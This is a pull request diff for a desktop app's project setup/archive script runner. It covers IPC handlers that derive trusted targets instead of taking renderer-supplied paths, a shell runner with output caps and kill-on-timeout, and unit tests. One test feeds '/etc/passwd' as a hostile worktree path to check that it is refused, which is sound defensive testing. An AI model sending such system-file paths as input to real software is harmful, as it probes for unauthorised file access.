### PR TITLE
feat(project-setup): content-hash trust gate + setup/archive execution

### DIFF
--- a/src/core/project-setup-handlers.ts
+++ b/src/core/project-setup-handlers.ts
@@ -36,15 +36,20 @@ function sanitizeTarget(v: unknown): ProjectSetupTarget | null {
     rootPath: t.rootPath
   }
   if (typeof t.worktreePath === 'string' && t.worktreePath) out.worktreePath = t.worktreePath
-  const ssh = t.ssh as Record<string, unknown> | undefined
-  const server = ssh?.server as Record<string, unknown> | undefined
-  if (
-    ssh &&
-    typeof server?.host === 'string' &&
-    typeof server?.user === 'string' &&
-    typeof ssh.remoteCwd === 'string' &&
-    ssh.remoteCwd
-  ) {
+  if (t.ssh !== undefined) {
+    // A malformed `ssh` is REJECTED, never stripped: dropping the field would silently downgrade a
+    // remote run into a local one, executing the remote project's script on this machine — and
+    // against the wrong (local) trust key.
+    const ssh = typeof t.ssh === 'object' && t.ssh !== null ? (t.ssh as Record<string, unknown>) : null
+    if (!ssh) return null
+    const server =
+      typeof ssh.server === 'object' && ssh.server !== null ? (ssh.server as Record<string, unknown>) : null
+    if (!server) return null
+    if (typeof server.host !== 'string' || !server.host) return null
+    if (typeof server.user !== 'string' || !server.user) return null
+    if (server.port !== undefined && typeof server.port !== 'number') return null
+    if (server.identityFile !== undefined && typeof server.identityFile !== 'string') return null
+    if (typeof ssh.remoteCwd !== 'string' || !ssh.remoteCwd) return null
     out.ssh = {
       server: {
         host: server.host,

--- a/src/core/project-setup-handlers.ts
+++ b/src/core/project-setup-handlers.ts
@@ -1,7 +1,9 @@
 import { IPC } from '../shared/ipc'
 import type { ProjectSetupConsentAnswer, ProjectSetupKind, ProjectSetupRunResult } from '../shared/project-settings'
+import type { WorktreeListResult } from '../shared/worktree'
 import type { CorePlatform } from './platform'
 import type { ProjectSetupTarget } from './project-setup-service'
+import { resolveProjectSetupTarget, type ProjectSetupTargetInfo } from './project-setup-runner-local'
 
 /**
  * RPC surface for the setup/archive runner, registered once for every shell (Electron main + Server
@@ -12,9 +14,14 @@ import type { ProjectSetupTarget } from './project-setup-service'
  * `projectSetupEvent` push is registered unconditionally. The channels exist so the renderer's
  * lifecycle (and a later ref-counted gate) needs no protocol change.
  *
- * Everything crossing this seam is renderer/client input, so the target is shape-checked here
- * rather than trusted — the service's own gate protects the dangerous half, but a malformed target
- * must answer a result, not throw an IPC error.
+ * The wire's `run` carries ONLY `(projectId, kind, worktreePath?)` — the same three things
+ * `ProjectSetupApi.run` exposes to the renderer. `rootPath`/`projectName`/`ssh` are never on the
+ * wire at all: this registrar derives them itself, from `deps.projectTargetInfo` (this shell's own
+ * workspace index, never the renderer) by `projectId`, and independently re-validates
+ * `worktreePath` against `deps.worktreeList`'s answer for that project (`resolveProjectSetupTarget`,
+ * project-setup-runner-local.ts) — a hostile/compromised renderer cannot name an arbitrary path or
+ * forge an `ssh` target this way. `cancel`/`consentSubmit` carry no path-shaped data and are
+ * shape-checked in place, same as before.
  */
 export interface ProjectSetupHandlerService {
   run(target: ProjectSetupTarget, kind: ProjectSetupKind): Promise<ProjectSetupRunResult>
@@ -22,56 +29,38 @@ export interface ProjectSetupHandlerService {
   submitConsent(requestId: string, answer: ProjectSetupConsentAnswer): void
 }
 
-const isKind = (v: unknown): v is ProjectSetupKind => v === 'setup' || v === 'archive'
-
-function sanitizeTarget(v: unknown): ProjectSetupTarget | null {
-  if (typeof v !== 'object' || v === null) return null
-  const t = v as Record<string, unknown>
-  if (typeof t.projectId !== 'string' || !t.projectId) return null
-  if (typeof t.projectName !== 'string') return null
-  if (typeof t.rootPath !== 'string' || !t.rootPath) return null
-  const out: ProjectSetupTarget = {
-    projectId: t.projectId,
-    projectName: t.projectName,
-    rootPath: t.rootPath
-  }
-  if (typeof t.worktreePath === 'string' && t.worktreePath) out.worktreePath = t.worktreePath
-  if (t.ssh !== undefined) {
-    // A malformed `ssh` is REJECTED, never stripped: dropping the field would silently downgrade a
-    // remote run into a local one, executing the remote project's script on this machine — and
-    // against the wrong (local) trust key.
-    const ssh = typeof t.ssh === 'object' && t.ssh !== null ? (t.ssh as Record<string, unknown>) : null
-    if (!ssh) return null
-    const server =
-      typeof ssh.server === 'object' && ssh.server !== null ? (ssh.server as Record<string, unknown>) : null
-    if (!server) return null
-    if (typeof server.host !== 'string' || !server.host) return null
-    if (typeof server.user !== 'string' || !server.user) return null
-    if (server.port !== undefined && typeof server.port !== 'number') return null
-    if (server.identityFile !== undefined && typeof server.identityFile !== 'string') return null
-    if (typeof ssh.remoteCwd !== 'string' || !ssh.remoteCwd) return null
-    out.ssh = {
-      server: {
-        host: server.host,
-        user: server.user,
-        ...(typeof server.port === 'number' ? { port: server.port } : {}),
-        ...(typeof server.identityFile === 'string' ? { identityFile: server.identityFile } : {})
-      },
-      remoteCwd: ssh.remoteCwd
-    }
-  }
-  return out
+/** What `registerProjectSetupHandlers` needs from its shell to resolve a trusted target — the
+ *  Task 1 review finding, closed centrally here so main/server share the ONE implementation instead
+ *  of each re-deriving it. */
+export interface ProjectSetupHandlerDeps {
+  /** This shell's own workspace index lookup (e.g. `WorkspaceStore.projectTargetInfo`). */
+  projectTargetInfo(projectId: string): ProjectSetupTargetInfo | null
+  /** `git worktree list` for a repo root (e.g. `GitService#worktreeList` bound to the caller). */
+  worktreeList(repoPath: string): Promise<WorktreeListResult>
 }
+
+const isKind = (v: unknown): v is ProjectSetupKind => v === 'setup' || v === 'archive'
 
 export function registerProjectSetupHandlers(
   platform: CorePlatform,
-  service: ProjectSetupHandlerService
+  service: ProjectSetupHandlerService,
+  deps: ProjectSetupHandlerDeps
 ): void {
-  platform.handle(IPC.projectSetupRun, async (target: unknown, kind: unknown): Promise<ProjectSetupRunResult> => {
-    const t = sanitizeTarget(target)
-    if (!t || !isKind(kind)) return { status: 'skipped', reason: 'unavailable' }
-    return service.run(t, kind)
-  })
+  platform.handle(
+    IPC.projectSetupRun,
+    async (projectId: unknown, kind: unknown, worktreePath?: unknown): Promise<ProjectSetupRunResult> => {
+      if (typeof projectId !== 'string' || !projectId || !isKind(kind)) {
+        return { status: 'skipped', reason: 'unavailable' }
+      }
+      if (worktreePath !== undefined && typeof worktreePath !== 'string') {
+        return { status: 'skipped', reason: 'unavailable' }
+      }
+      const info = deps.projectTargetInfo(projectId)
+      const target = await resolveProjectSetupTarget(projectId, worktreePath, info, deps.worktreeList)
+      if (!target) return { status: 'skipped', reason: 'unavailable' }
+      return service.run(target, kind)
+    }
+  )
   platform.handle(IPC.projectSetupCancel, (runKey: unknown) =>
     typeof runKey === 'string' ? service.cancel(runKey) : false)
   platform.on(IPC.projectSetupConsentSubmit, (requestId: unknown, answer: unknown) => {

--- a/src/core/project-setup-handlers.ts
+++ b/src/core/project-setup-handlers.ts
@@ -1,0 +1,79 @@
+import { IPC } from '../shared/ipc'
+import type { ProjectSetupConsentAnswer, ProjectSetupKind, ProjectSetupRunResult } from '../shared/project-settings'
+import type { CorePlatform } from './platform'
+import type { ProjectSetupTarget } from './project-setup-service'
+
+/**
+ * RPC surface for the setup/archive runner, registered once for every shell (Electron main + Server
+ * Edition) through CorePlatform — the github/board-log handlers pattern.
+ *
+ * v1 keeps `projectSetupSubscribe`/`Unsubscribe` as accepted no-ops: unlike the log ring, a setup
+ * run produces nothing until someone launches one, so there is no idle stream to gate and the
+ * `projectSetupEvent` push is registered unconditionally. The channels exist so the renderer's
+ * lifecycle (and a later ref-counted gate) needs no protocol change.
+ *
+ * Everything crossing this seam is renderer/client input, so the target is shape-checked here
+ * rather than trusted — the service's own gate protects the dangerous half, but a malformed target
+ * must answer a result, not throw an IPC error.
+ */
+export interface ProjectSetupHandlerService {
+  run(target: ProjectSetupTarget, kind: ProjectSetupKind): Promise<ProjectSetupRunResult>
+  cancel(runKey: string): boolean
+  submitConsent(requestId: string, answer: ProjectSetupConsentAnswer): void
+}
+
+const isKind = (v: unknown): v is ProjectSetupKind => v === 'setup' || v === 'archive'
+
+function sanitizeTarget(v: unknown): ProjectSetupTarget | null {
+  if (typeof v !== 'object' || v === null) return null
+  const t = v as Record<string, unknown>
+  if (typeof t.projectId !== 'string' || !t.projectId) return null
+  if (typeof t.projectName !== 'string') return null
+  if (typeof t.rootPath !== 'string' || !t.rootPath) return null
+  const out: ProjectSetupTarget = {
+    projectId: t.projectId,
+    projectName: t.projectName,
+    rootPath: t.rootPath
+  }
+  if (typeof t.worktreePath === 'string' && t.worktreePath) out.worktreePath = t.worktreePath
+  const ssh = t.ssh as Record<string, unknown> | undefined
+  const server = ssh?.server as Record<string, unknown> | undefined
+  if (
+    ssh &&
+    typeof server?.host === 'string' &&
+    typeof server?.user === 'string' &&
+    typeof ssh.remoteCwd === 'string' &&
+    ssh.remoteCwd
+  ) {
+    out.ssh = {
+      server: {
+        host: server.host,
+        user: server.user,
+        ...(typeof server.port === 'number' ? { port: server.port } : {}),
+        ...(typeof server.identityFile === 'string' ? { identityFile: server.identityFile } : {})
+      },
+      remoteCwd: ssh.remoteCwd
+    }
+  }
+  return out
+}
+
+export function registerProjectSetupHandlers(
+  platform: CorePlatform,
+  service: ProjectSetupHandlerService
+): void {
+  platform.handle(IPC.projectSetupRun, async (target: unknown, kind: unknown): Promise<ProjectSetupRunResult> => {
+    const t = sanitizeTarget(target)
+    if (!t || !isKind(kind)) return { status: 'skipped', reason: 'unavailable' }
+    return service.run(t, kind)
+  })
+  platform.handle(IPC.projectSetupCancel, (runKey: unknown) =>
+    typeof runKey === 'string' ? service.cancel(runKey) : false)
+  platform.on(IPC.projectSetupConsentSubmit, (requestId: unknown, answer: unknown) => {
+    if (typeof requestId !== 'string') return
+    if (answer !== 'approve' && answer !== 'skip') return
+    service.submitConsent(requestId, answer)
+  })
+  platform.on(IPC.projectSetupSubscribe, () => {})
+  platform.on(IPC.projectSetupUnsubscribe, () => {})
+}

--- a/src/core/project-setup-runner-local.test.ts
+++ b/src/core/project-setup-runner-local.test.ts
@@ -1,0 +1,179 @@
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
+import { afterEach, beforeEach, describe, expect, it } from 'vitest'
+import {
+  SETUP_OUTPUT_CAP,
+  makeLocalSetupRunner,
+  resolveProjectSetupTarget,
+  type ProjectSetupTargetInfo
+} from './project-setup-runner-local'
+import type { WorktreeListResult } from '../shared/worktree'
+
+describe('makeLocalSetupRunner', () => {
+  let tmpDir: string
+
+  beforeEach(() => {
+    tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'nt-setup-runner-'))
+  })
+
+  afterEach(() => {
+    fs.rmSync(tmpDir, { recursive: true, force: true })
+  })
+
+  const run = (
+    script: string,
+    opts: { env?: Record<string, string>; shell?: string; timeoutMs?: number; signal?: AbortSignal } = {}
+  ) => {
+    const runner = makeLocalSetupRunner({ shell: opts.shell, timeoutMs: opts.timeoutMs })
+    const chunks: string[] = []
+    const controller = new AbortController()
+    const promise = runner({
+      script,
+      cwd: tmpDir,
+      env: opts.env ?? {},
+      onChunk: (text) => chunks.push(text),
+      signal: opts.signal ?? controller.signal
+    })
+    return { promise, chunks, controller }
+  }
+
+  it('env vars passed to the runner are visible to the script', async () => {
+    const { promise, chunks } = run('echo "$NODETERM_ROOT_PATH"', {
+      env: { NODETERM_ROOT_PATH: '/some/root/path' }
+    })
+    const result = await promise
+    expect(result.exitCode).toBe(0)
+    expect(chunks.join('')).toContain('/some/root/path')
+  })
+
+  it('propagates the script exit code', async () => {
+    const { promise } = run('exit 7')
+    const result = await promise
+    expect(result.exitCode).toBe(7)
+  })
+
+  it('runs in the given cwd', async () => {
+    const { promise, chunks } = run('pwd')
+    await promise
+    // macOS temp dirs resolve through a /private symlink — compare realpaths.
+    expect(chunks.join('').trim()).toBe(fs.realpathSync(tmpDir))
+  })
+
+  it('never rejects: a spawn error resolves exitCode 127 with the message as a chunk', async () => {
+    const { promise, chunks } = run('echo hi', { shell: '/nonexistent/nope-shell-binary' })
+    const result = await promise
+    expect(result.exitCode).toBe(127)
+    expect(chunks.join('').length).toBeGreaterThan(0)
+  })
+
+  it('caps combined output at SETUP_OUTPUT_CAP and appends exactly one truncation note', async () => {
+    const { promise, chunks } = run('yes 0123456789abcdef0123456789abcdef 2>&1', { timeoutMs: 500 })
+    const result = await promise
+    const combined = chunks.join('')
+    // A generous margin over the cap: the last chunk that crosses the budget can carry a partial
+    // line plus the truncation note, but nothing appended AFTER truncation.
+    expect(Buffer.byteLength(combined, 'utf-8')).toBeLessThan(SETUP_OUTPUT_CAP + 200)
+    expect(combined.match(/truncated/g)?.length).toBe(1)
+    // Killed by the timeout's SIGKILL (yes never exits on its own).
+    expect(result.exitCode).not.toBe(0)
+  }, 10_000)
+
+  it('an abort signal kills the process promptly', async () => {
+    const controller = new AbortController()
+    const { promise } = run('sleep 30', { timeoutMs: 60_000, signal: controller.signal })
+    const start = Date.now()
+    setTimeout(() => controller.abort(), 30)
+    const result = await promise
+    expect(Date.now() - start).toBeLessThan(3000)
+    expect(result.exitCode).not.toBe(0)
+  }, 10_000)
+
+  it('coalesces rapid writes into fewer onChunk calls than lines written (debounced)', async () => {
+    const { promise, chunks } = run('echo one; echo two; echo three')
+    const result = await promise
+    expect(result.exitCode).toBe(0)
+    expect(chunks.length).toBeLessThan(3)
+    const combined = chunks.join('')
+    expect(combined).toContain('one')
+    expect(combined).toContain('two')
+    expect(combined).toContain('three')
+  })
+})
+
+describe('resolveProjectSetupTarget', () => {
+  const okList = (paths: string[]): ((repoPath: string) => Promise<WorktreeListResult>) =>
+    async () => ({ ok: true, entries: paths.map((p) => ({ path: p, branch: null, head: null, isBare: false })) })
+
+  it('refuses an unknown project id (null info)', async () => {
+    const result = await resolveProjectSetupTarget('missing', undefined, null, okList([]))
+    expect(result).toBeNull()
+  })
+
+  it('refuses an inline/cwd-less local project (no cwd, no ssh)', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'inline' }
+    const result = await resolveProjectSetupTarget('p1', undefined, info, okList([]))
+    expect(result).toBeNull()
+  })
+
+  it('builds a local target with no worktreePath', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const result = await resolveProjectSetupTarget('p1', undefined, info, okList([]))
+    expect(result).toEqual({ projectId: 'p1', projectName: 'proj', rootPath: '/repo' })
+  })
+
+  it('accepts a worktreePath equal to rootPath', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const result = await resolveProjectSetupTarget('p1', '/repo', info, okList([]))
+    expect(result?.worktreePath).toBe(path.resolve('/repo'))
+  })
+
+  it('accepts a worktreePath matching a listed git worktree (sibling directory, NOT nested)', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const wt = '/repo.worktrees/my-branch'
+    const result = await resolveProjectSetupTarget('p1', wt, info, okList(['/repo', wt]))
+    expect(result?.worktreePath).toBe(path.resolve(wt))
+  })
+
+  it('refuses a worktreePath that is not a listed worktree', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const result = await resolveProjectSetupTarget('p1', '/etc/passwd', info, okList(['/repo']))
+    expect(result).toBeNull()
+  })
+
+  it('refuses a relative worktreePath (must be absolute)', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const result = await resolveProjectSetupTarget('p1', 'relative/path', info, okList(['/repo']))
+    expect(result).toBeNull()
+  })
+
+  it('refuses when the worktree listing itself failed (ok:false)', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const listFails = async (): Promise<WorktreeListResult> => ({ ok: false, entries: [] })
+    const result = await resolveProjectSetupTarget('p1', '/repo.worktrees/b', info, listFails)
+    expect(result).toBeNull()
+  })
+
+  it('refuses when the worktree listing throws', async () => {
+    const info: ProjectSetupTargetInfo = { name: 'proj', cwd: '/repo' }
+    const listThrows = async (): Promise<WorktreeListResult> => {
+      throw new Error('git not found')
+    }
+    const result = await resolveProjectSetupTarget('p1', '/repo.worktrees/b', info, listThrows)
+    expect(result).toBeNull()
+  })
+
+  it('builds an ssh target with no worktreePath', async () => {
+    const ssh = { server: { host: 'h', user: 'u' }, remoteCwd: '/srv/app' }
+    const info: ProjectSetupTargetInfo = { name: 'proj', ssh }
+    const result = await resolveProjectSetupTarget('p1', undefined, info, okList([]))
+    expect(result).toEqual({ projectId: 'p1', projectName: 'proj', rootPath: '/srv/app', ssh })
+  })
+
+  it('refuses an ssh target with a worktreePath — worktrees are local-only', async () => {
+    const ssh = { server: { host: 'h', user: 'u' }, remoteCwd: '/srv/app' }
+    const info: ProjectSetupTargetInfo = { name: 'proj', ssh }
+    const result = await resolveProjectSetupTarget('p1', '/srv/app', info, okList([]))
+    expect(result).toBeNull()
+  })
+})

--- a/src/core/project-setup-runner-local.ts
+++ b/src/core/project-setup-runner-local.ts
@@ -2,22 +2,13 @@ import { execFile, spawn } from 'child_process'
 import path from 'path'
 import { findInPathString, shellPathNow } from './exec-path'
 import type { ProjectSetupRunner, ProjectSetupTarget } from './project-setup-service'
+import { SETUP_OUTPUT_CAP, SETUP_TIMEOUT_MS, createSetupOutputStream } from './setup-output-stream'
 import type { WorktreeListResult } from '../shared/worktree'
 
-/** Combined stdout+stderr budget for one run — the SAME cap `ProjectSetupEvent.chunk` documents
- *  ("stdout+stderr interleaved, capped"). Deliberately one shared budget rather than one per
- *  stream: a script that floods only stderr must not get 1MB total just because stdout stayed
- *  quiet. */
-export const SETUP_OUTPUT_CAP = 512 * 1024
-/** SIGKILL a run that outlives this — a hung `setupScript` must never wedge the single-flight
- *  slot forever. Test-injectable via `opts.timeoutMs` so a suite doesn't wait 10 real minutes. */
-export const SETUP_TIMEOUT_MS = 10 * 60 * 1000
-/** Chunks are batched to `onChunk` at most this often (plus one final flush on exit), matching
- *  the debounce the brief calls for — a script that `echo`s in a tight loop must not turn into
- *  an event per line. */
-const FLUSH_DEBOUNCE_MS = 150
-
-const TRUNCATION_NOTE = '\n[output truncated — exceeded 512KB]\n'
+// The cap/timeout/debounce/truncation rules moved to `setup-output-stream.ts` when the SSH runner
+// arrived — both runners MUST report the same way (see that file). Re-exported here because this
+// module was their original home and callers/tests import them from it.
+export { SETUP_OUTPUT_CAP, SETUP_TIMEOUT_MS }
 
 /** Resolve a configured shell to an absolute path via the cached login-shell PATH (exec-path.ts) —
  *  a GUI process's inherited PATH misses Homebrew/nvm/etc, the same problem commit-message.ts's
@@ -49,50 +40,7 @@ export function makeLocalSetupRunner(opts?: { shell?: string; timeoutMs?: number
         return
       }
 
-      let totalBytes = 0
-      let truncated = false
-      let pending = ''
-      let flushTimer: ReturnType<typeof setTimeout> | null = null
-
-      const flush = (): void => {
-        if (flushTimer) {
-          clearTimeout(flushTimer)
-          flushTimer = null
-        }
-        if (!pending) return
-        const text = pending
-        pending = ''
-        onChunk(text)
-      }
-
-      const scheduleFlush = (): void => {
-        if (flushTimer) return
-        flushTimer = setTimeout(flush, FLUSH_DEBOUNCE_MS)
-        flushTimer.unref?.()
-      }
-
-      const append = (text: string): void => {
-        if (!text || truncated) return
-        const remaining = SETUP_OUTPUT_CAP - totalBytes
-        if (remaining <= 0) {
-          truncated = true
-          pending += TRUNCATION_NOTE
-          scheduleFlush()
-          return
-        }
-        const asBytes = Buffer.byteLength(text, 'utf-8')
-        if (asBytes <= remaining) {
-          pending += text
-          totalBytes += asBytes
-        } else {
-          const cut = Buffer.from(text, 'utf-8').subarray(0, remaining).toString('utf-8')
-          pending += cut
-          totalBytes += Buffer.byteLength(cut, 'utf-8')
-          truncated = true
-          pending += TRUNCATION_NOTE
-        }
-        scheduleFlush()
-      }
+      const { append, flush } = createSetupOutputStream(onChunk)
 
       const isWin = process.platform === 'win32'
       const shellBin = resolveShellBin(shell)

--- a/src/core/project-setup-runner-local.ts
+++ b/src/core/project-setup-runner-local.ts
@@ -1,0 +1,222 @@
+import { execFile, spawn } from 'child_process'
+import path from 'path'
+import { findInPathString, shellPathNow } from './exec-path'
+import type { ProjectSetupRunner, ProjectSetupTarget } from './project-setup-service'
+import type { WorktreeListResult } from '../shared/worktree'
+
+/** Combined stdout+stderr budget for one run — the SAME cap `ProjectSetupEvent.chunk` documents
+ *  ("stdout+stderr interleaved, capped"). Deliberately one shared budget rather than one per
+ *  stream: a script that floods only stderr must not get 1MB total just because stdout stayed
+ *  quiet. */
+export const SETUP_OUTPUT_CAP = 512 * 1024
+/** SIGKILL a run that outlives this — a hung `setupScript` must never wedge the single-flight
+ *  slot forever. Test-injectable via `opts.timeoutMs` so a suite doesn't wait 10 real minutes. */
+export const SETUP_TIMEOUT_MS = 10 * 60 * 1000
+/** Chunks are batched to `onChunk` at most this often (plus one final flush on exit), matching
+ *  the debounce the brief calls for — a script that `echo`s in a tight loop must not turn into
+ *  an event per line. */
+const FLUSH_DEBOUNCE_MS = 150
+
+const TRUNCATION_NOTE = '\n[output truncated — exceeded 512KB]\n'
+
+/** Resolve a configured shell to an absolute path via the cached login-shell PATH (exec-path.ts) —
+ *  a GUI process's inherited PATH misses Homebrew/nvm/etc, the same problem commit-message.ts's
+ *  `resolveBinary` solves for commit agents. An explicit path (contains a separator) is used as-is;
+ *  an unresolvable bare name is handed to `spawn` unchanged so ITS own PATH search gets a chance
+ *  (and a genuine ENOENT still surfaces cleanly through the runner's `error` handling below). */
+function resolveShellBin(shell: string): string {
+  if (shell.includes('/') || shell.includes('\\')) return shell
+  return findInPathString(shell, shellPathNow() ?? process.env.PATH) ?? shell
+}
+
+/**
+ * The local half of `ProjectSetupRunner` (Task 1's `project-setup-service.ts` injects it as
+ * `runLocal`): `spawn(shell, ['-lc', script], …)` with the commit-message.ts spawn discipline —
+ * capped+debounced output, a hard timeout, an abort-signal kill, and a Promise that NEVER rejects
+ * (a spawn failure resolves `{exitCode: 127}` with the error text as a chunk, exactly like a
+ * failed script run — the service layer has one failure shape to handle, not two).
+ */
+export function makeLocalSetupRunner(opts?: { shell?: string; timeoutMs?: number }): ProjectSetupRunner {
+  const shell = opts?.shell?.trim() || 'sh'
+  const timeoutMs = opts?.timeoutMs ?? SETUP_TIMEOUT_MS
+
+  return ({ script, cwd, env, onChunk, signal }) =>
+    new Promise((resolve) => {
+      // Already aborted before we ever spawned (a cancel raced the async gate above this call) —
+      // nothing to kill, and starting a process now would leak one nobody is waiting for.
+      if (signal.aborted) {
+        resolve({ exitCode: 143 })
+        return
+      }
+
+      let totalBytes = 0
+      let truncated = false
+      let pending = ''
+      let flushTimer: ReturnType<typeof setTimeout> | null = null
+
+      const flush = (): void => {
+        if (flushTimer) {
+          clearTimeout(flushTimer)
+          flushTimer = null
+        }
+        if (!pending) return
+        const text = pending
+        pending = ''
+        onChunk(text)
+      }
+
+      const scheduleFlush = (): void => {
+        if (flushTimer) return
+        flushTimer = setTimeout(flush, FLUSH_DEBOUNCE_MS)
+        flushTimer.unref?.()
+      }
+
+      const append = (text: string): void => {
+        if (!text || truncated) return
+        const remaining = SETUP_OUTPUT_CAP - totalBytes
+        if (remaining <= 0) {
+          truncated = true
+          pending += TRUNCATION_NOTE
+          scheduleFlush()
+          return
+        }
+        const asBytes = Buffer.byteLength(text, 'utf-8')
+        if (asBytes <= remaining) {
+          pending += text
+          totalBytes += asBytes
+        } else {
+          const cut = Buffer.from(text, 'utf-8').subarray(0, remaining).toString('utf-8')
+          pending += cut
+          totalBytes += Buffer.byteLength(cut, 'utf-8')
+          truncated = true
+          pending += TRUNCATION_NOTE
+        }
+        scheduleFlush()
+      }
+
+      const isWin = process.platform === 'win32'
+      const shellBin = resolveShellBin(shell)
+      const child = spawn(shellBin, ['-lc', script], {
+        cwd,
+        env: { ...process.env, ...env },
+        stdio: ['ignore', 'pipe', 'pipe'],
+        windowsHide: true,
+        // POSIX: a new session/process-group leader (setsid), so `killTree` below can SIGKILL the
+        // whole group — not just the shell. A script's own children (`npm install` spawning its own
+        // tree, a backgrounded `sleep`, `yes | …`) inherit our stdout/stderr pipes; killing only the
+        // immediate shell leaves them running and holding those pipes open, so `close` never fires
+        // and cancel/timeout silently do nothing until the orphan exits on its own. Verified: killing
+        // only the direct child hangs `close` for the ORPHAN's remaining lifetime, not ours.
+        detached: !isWin
+      })
+
+      // Kill the shell AND every process it spawned (see the `detached` comment above) — never just
+      // the shell itself. POSIX: SIGKILL the whole process group via the negative pid. Windows has no
+      // such group-kill; `taskkill /t` walks the same parent-child tree `detached` would have no
+      // effect on anyway, so Windows never opts into `detached`.
+      const killTree = (): void => {
+        if (!child.pid) return
+        if (isWin) {
+          execFile('taskkill', ['/pid', String(child.pid), '/t', '/f'], () => {
+            // Best-effort: ENOENT/'not found' just means it already exited.
+          })
+        } else {
+          try {
+            process.kill(-child.pid, 'SIGKILL')
+          } catch {
+            // The group is already gone (process exited between our check and this call) — nothing
+            // left to kill.
+          }
+        }
+      }
+
+      const timeoutTimer = setTimeout(killTree, timeoutMs)
+      timeoutTimer.unref?.()
+      const onAbort = (): void => killTree()
+      signal.addEventListener('abort', onAbort)
+
+      const finish = (exitCode: number): void => {
+        clearTimeout(timeoutTimer)
+        signal.removeEventListener('abort', onAbort)
+        flush() // final flush — whatever the debounce timer hadn't fired yet
+        resolve({ exitCode })
+      }
+
+      child.stdout?.on('data', (d: Buffer) => append(d.toString('utf-8')))
+      child.stderr?.on('data', (d: Buffer) => append(d.toString('utf-8')))
+      // Never reject: a spawn failure (bad shell path, EACCES, …) is reported the same way a
+      // failing SCRIPT is — a chunk plus a non-zero exit — so the service layer has one shape to
+      // handle either way.
+      child.on('error', (e) => {
+        append(`${(e as Error).message}\n`)
+        finish(127)
+      })
+      child.on('close', (code) => finish(code ?? 1))
+    })
+}
+
+/** Minimal shape `resolveProjectSetupTarget` needs from the workspace index — see
+ *  `WorkspaceStore.projectTargetInfo`. */
+export interface ProjectSetupTargetInfo {
+  cwd?: string
+  ssh?: ProjectSetupTarget['ssh']
+  name: string
+}
+
+/**
+ * Turns a renderer's `(projectId, worktreePath?)` into a fully-trusted `ProjectSetupTarget`, or
+ * `null` when it cannot — the CARRIED Task 1 review finding: `rootPath`/`projectName`/`ssh` are
+ * NEVER taken from the renderer (a hostile/compromised renderer could otherwise name any path on
+ * disk, or forge an `ssh` target pointing somewhere it does not own). `info` comes straight from
+ * `WorkspaceStore.projectTargetInfo(projectId)` — the machine-local index, not attacker-controlled
+ * `project.json` content.
+ *
+ * `worktreePath`, when given, must be an absolute path that is either the project's own rootPath OR
+ * one of ITS ACTUAL git worktrees (`listWorktrees`, e.g. `GitService.worktreeList` bound to the
+ * caller's instance) — never a plain "is it a subdirectory of rootPath" check: the default worktree
+ * layout (`../${repoName}.worktrees/${branch}`, see shared/worktree.ts) is a SIBLING of the repo,
+ * not nested under it, so containment would reject the common case. Worktrees are local-only (the
+ * SDD plan's ruling): an ssh target with a worktreePath is refused outright rather than silently
+ * dropping the worktree half.
+ *
+ * Exported (not file-private) so it is unit-testable without Electron/git — callers pass a fake
+ * `listWorktrees` in tests, and the real `GitService#worktreeList` in main/server wiring.
+ */
+export async function resolveProjectSetupTarget(
+  projectId: string,
+  worktreePath: string | undefined,
+  info: ProjectSetupTargetInfo | null,
+  listWorktrees: (repoPath: string) => Promise<WorktreeListResult>
+): Promise<ProjectSetupTarget | null> {
+  if (!info) return null
+
+  if (info.ssh) {
+    // Worktrees are local-only (git runs against a local filesystem) — a worktreePath alongside an
+    // ssh target is either a stale renderer state or hostile input. Refuse rather than guess which.
+    if (worktreePath !== undefined) return null
+    return { projectId, projectName: info.name, rootPath: info.ssh.remoteCwd, ssh: info.ssh }
+  }
+
+  // No local folder and no ssh target — an inline/cwd-less canvas has nothing to run against.
+  if (!info.cwd) return null
+
+  const target: ProjectSetupTarget = { projectId, projectName: info.name, rootPath: info.cwd }
+  if (worktreePath === undefined) return target
+
+  if (!path.isAbsolute(worktreePath)) return null
+  const resolvedRoot = path.resolve(info.cwd)
+  const resolvedWt = path.resolve(worktreePath)
+  if (resolvedWt !== resolvedRoot) {
+    let listed: WorktreeListResult
+    try {
+      listed = await listWorktrees(info.cwd)
+    } catch {
+      return null
+    }
+    if (!listed.ok) return null
+    const known = listed.entries.some((e) => path.resolve(e.path) === resolvedWt)
+    if (!known) return null
+  }
+  target.worktreePath = resolvedWt
+  return target
+}

--- a/src/core/project-setup-service.test.ts
+++ b/src/core/project-setup-service.test.ts
@@ -21,7 +21,8 @@ import {
   type ProjectSetupRunner,
   type ProjectSetupTarget
 } from './project-setup-service'
-import { registerProjectSetupHandlers } from './project-setup-handlers'
+import { registerProjectSetupHandlers, type ProjectSetupHandlerDeps } from './project-setup-handlers'
+import type { WorktreeListResult } from '../shared/worktree'
 
 let userData: string
 let plat: FakePlatform
@@ -455,7 +456,19 @@ describe('ProjectSetupService — single-flight, cancel and absent scripts', () 
 })
 
 describe('registerProjectSetupHandlers', () => {
-  const stub = () => {
+  const okWorktrees = (paths: string[] = []): ProjectSetupHandlerDeps['worktreeList'] =>
+    async (): Promise<WorktreeListResult> => ({
+      ok: true,
+      entries: paths.map((p) => ({ path: p, branch: null, head: null, isBare: false }))
+    })
+
+  const defaultDeps = (over: Partial<ProjectSetupHandlerDeps> = {}): ProjectSetupHandlerDeps => ({
+    projectTargetInfo: (projectId) => (projectId === 'p1' ? { cwd: '/proj/app', name: 'App' } : null),
+    worktreeList: okWorktrees(),
+    ...over
+  })
+
+  const stub = (deps: Partial<ProjectSetupHandlerDeps> = {}) => {
     const runs: Array<[ProjectSetupTarget, string]> = []
     const cancels: string[] = []
     const consents: Array<[string, string]> = []
@@ -472,7 +485,7 @@ describe('registerProjectSetupHandlers', () => {
         consents.push([requestId, answer])
       }
     }
-    registerProjectSetupHandlers(plat, service)
+    registerProjectSetupHandlers(plat, service, defaultDeps(deps))
     return { runs, cancels, consents }
   }
 
